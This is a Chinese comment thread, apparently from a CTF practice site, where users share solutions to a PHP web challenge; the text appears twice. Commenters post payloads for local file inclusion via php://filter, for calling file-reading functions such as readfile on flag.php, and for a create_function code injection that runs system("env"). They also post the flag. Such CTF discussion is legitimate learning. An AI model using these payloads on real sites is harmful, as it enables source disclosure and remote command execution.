不知道为啥 http://82.157.146.43:10618/include.php?file=index 可以 显示出来,http://82.157.146.43:10618/include.php?file=createfun就不行
createfun.php?func=readfile&arg=flag.php,php查看文件的函数都可以试试
createfun.php?func=create_function&&arg=){}system("env");//
这个角度清奇哎,我是createfun.php?func=readfile&arg=flag.php
nuaactf{php_IS_thE_best_language}
html注释,cookie,/include.php?file=php://filter/read=convert.base64-encode/resource=createfun, /createfun.php?func=highlight_file&arg=flag.php
注释有一个include.php,访问发现有文件包含,调出源码后提示createfun.php,发现可以执行自定义函数,show_source flag.php
...
评论
vincentshine 23天前
举报
不知道为啥 http://82.157.146.43:10618/include.php?file=index 可以 显示出来,http://82.157.146.43:10618/include.php?file=createfun就不行
xiaobai568 7月前
举报
createfun.php?func=readfile&arg=flag.php,php查看文件的函数都可以试试
coolsword2023 10月前
举报
createfun.php?func=create_function&&arg=){}system("env");//
xiaoxiao972521 7月前
举报
这个角度清奇哎,我是createfun.php?func=readfile&arg=flag.php
zhaiye 11月前
举报
nuaactf{php_IS_thE_best_language}
justsosoloveyou 1年前
举报
html注释,cookie,/include.php?file=php://filter/read=convert.base64-encode/resource=createfun, /createfun.php?func=highlight_file&arg=flag.php
hopeinhand 1年前
举报
注释有一个include.php,访问发现有文件包含,调出源码后提示createfun.php,发现可以执行自定义函数,show_source flag.php